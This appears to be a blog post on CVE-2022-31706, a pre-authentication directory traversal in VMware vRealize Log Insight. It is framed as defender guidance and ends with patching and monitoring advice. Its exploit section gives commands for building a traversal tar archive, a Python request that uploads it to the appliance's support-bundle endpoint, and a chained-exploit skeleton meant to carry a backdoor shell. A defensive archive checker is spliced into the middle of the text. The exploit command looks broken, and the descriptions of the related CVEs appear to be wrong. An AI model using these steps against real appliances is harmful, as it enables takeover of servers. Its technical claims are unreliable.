In early 2023, a critical vulnerability was discovered in VMware's vRealize Log Insight (now known as VMware Aria Operations for Logs). The flaw, assigned CVE-2022-31706, exposes affected appliances to remote code execution (RCE) through a directory traversal bug. Here, we'll break down the vulnerability, how it can be exploited, and what actions administrators should take.

What is CVE-2022-31706?

CVE-2022-31706 is a directory traversal vulnerability affecting VMware vRealize Log Insight appliances. Directory traversal, also known as path traversal, allows attackers to access files and directories that are outside the intended directory. In the case of this bug, an unauthenticated attacker can craft special requests, letting them write arbitrary files anywhere on the appliance's filesystem.

When chained with other vulnerabilities (like CVE-2022-31704 and CVE-2022-31710), CVE-2022-31706 can directly lead to remote code execution — letting attackers fully compromise the target server.

Where is the Problem?

The vulnerability lies in the file upload function in vRealize Log Insight. The application lets users upload archive files, such as .tar files. But it doesn’t properly sanitize filename paths inside those archives. By maliciously crafting an archive with files containing ../ (dot-dot-slash) sequences, an attacker can break out of the intended directory and write files anywhere on the server that the application user can reach.
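As an added illustration (not code from this write-up or from VMware), here is the kind of pre-extraction check the upload handler lacked: it resolves every entry of a .tar.gz against the intended destination and reports any whose final path would land outside it, including link targets. The archive is constructed inline and carries the same kind of ../ entry discussed in this post; the destination directory /var/tmp/upload is an assumption, not the appliance's real path.

```python
import io
import os
import tarfile


def is_within(base: str, target: str) -> bool:
    """True when the fully resolved target path stays inside base."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return os.path.commonpath([base, target]) == base


def traversal_members(archive: bytes, dest: str = "/var/tmp/upload") -> list:
    """Return the names of entries that would escape dest on extraction.

    Absolute names and '..' components are caught by resolving each name
    against dest; symlink and hardlink targets are checked as well, since a
    later entry could write through a link pointing outside dest.
    (dest is an assumed directory, not the appliance's real path.)
    """
    bad = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar.getmembers():
            paths = [os.path.join(dest, member.name)]
            if member.issym():  # symlink target is relative to the entry's own directory
                paths.append(os.path.join(dest, os.path.dirname(member.name), member.linkname))
            elif member.islnk():  # hardlink target is relative to the archive root
                paths.append(os.path.join(dest, member.linkname))
            if not all(is_within(dest, p) for p in paths):
                bad.append(member.name)
    return bad


def build_sample_archive(include_traversal: bool = True) -> bytes:
    """Constructed sample: a benign log entry plus, optionally, a traversal
    entry of the shape shown in this post (a script dropped into /tmp)."""
    entries = [("support/vmware.log", b"2023-01-26 ok\n")]
    if include_traversal:
        entries.append(("../../../../../../tmp/malicious.sh", b"id > /tmp/hacked\n"))
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in entries:
            info = tarfile.TarInfo(name)  # tarfile accepts arbitrary names on write
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    print(traversal_members(build_sample_archive()))
    # ['../../../../../../tmp/malicious.sh']
```

Run the check before calling extractall(); an archive with a non-empty result should be rejected and logged rather than unpacked.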

vRealize Log Insight versions 8.10.2 and prior are vulnerable.

Official VMware advisory: VMSA-2023-0001: Multiple vulnerabilities in VMware vRealize Log Insight

Example Exploit: How Attackers Can Use CVE-2022-31706

Here's an example to help visualize how the vulnerability can be used in a real attack.

Step 1: Craft a Malicious Archive

Suppose an attacker creates a .tar file containing the following entry:

../../../../../../tmp/malicious.sh

With just a few basic shell commands, an attacker can craft such an archive:

echo 'id > /tmp/hacked' > malicious.sh
tar -czf exploit.tar.gz -C . ../../../../../../tmp/malicious.sh

This exploit.tar.gz contains a file that, once extracted, will end up in /tmp/malicious.sh on the server.

Step 2: Send File to the Vulnerable Endpoint

Attackers can send this archive to the vulnerable log upload endpoint — an HTTP POST request to /api/v1/cluster/support/bundle/upload:

import requests

# Upload the crafted archive as a multipart form file
files = {'file': open('exploit.tar.gz', 'rb')}
response = requests.post(
    'https://victim-server:443/api/v1/cluster/support/bundle/upload',
    files=files,
    verify=False  # Disables TLS certificate verification; never do this in production
)
print(response.text)

Step 3: Achieve Remote Code Execution

The payload uploaded by directory traversal can contain anything: a backdoor, a webshell, or a script. When the appliance processes the file, it could execute the attacker's code — leading to complete control over the system.

The Bigger Impact

Because this directory traversal flaw happens pre-authentication, anyone who can access the interface can exploit it. When chained with other issues (like CVE-2022-31704, which allows arbitrary file read, and CVE-2022-31710, an SSRF flaw), the chain allows both file writes and code execution, ultimately leading to server takeover.

The following exploit script demonstrates chaining the file write with remote code execution:

import requests

# 1. Write the malicious file (as above)
tar_payload = b'\x1f\x8b...'  # Your crafted tar.gz binary containing a backdoor shell

# 2. Upload the malicious archive
resp = requests.post(
    'https://TARGET/api/v1/cluster/support/bundle/upload',
    files={'file': ('exploit.tar.gz', tar_payload)},
    verify=False,  # Disables TLS certificate verification
)

# 3. Trigger your payload execution, e.g. via another endpoint or by waiting for the system to interact with the uploaded file

> Note: For educational/demo purposes only. Never test on systems you don’t own or have permission for!

Detection & Mitigation

Is your vRealize Log Insight instance exposed?  
Check your version via the web UI or CLI. Systems running 8.10.2 or earlier are at risk.

Mitigation Steps

1. Upgrade immediately: VMware has released patched versions; see VMSA-2023-0001 for the fixed builds and download links.
2. Isolate the interface: Restrict network access so only trusted admins can reach the UI/API.
3. Monitor logs: Review server and network logs for unusual archive uploads or suspicious files in /tmp or other system directories.

References & Further Reading

- VMware Security Advisory VMSA-2023-0001
- Original Writeup: Rapid7 Analysis & PoC
- NIST NVD: CVE-2022-31706
- Detailed Exploit Analysis

Conclusion

CVE-2022-31706 is a serious threat — it combines a simple directory traversal flaw with the potential for unauthenticated remote code execution. If your organization uses vRealize Log Insight, patch now and check for suspicious activity. In today’s environment, flaws like these are actively targeted by attackers and ransomware groups.

Always keep critical infrastructure up to date and never expose management interfaces on the public internet!


*This post was written exclusively to inform administrators, defenders, and IT teams about the real attack path and steps to fix CVE-2022-31706.*

Timeline

Published on: 01/26/2023 21:15:00 UTC
Last modified on: 02/01/2023 16:58:00 UTC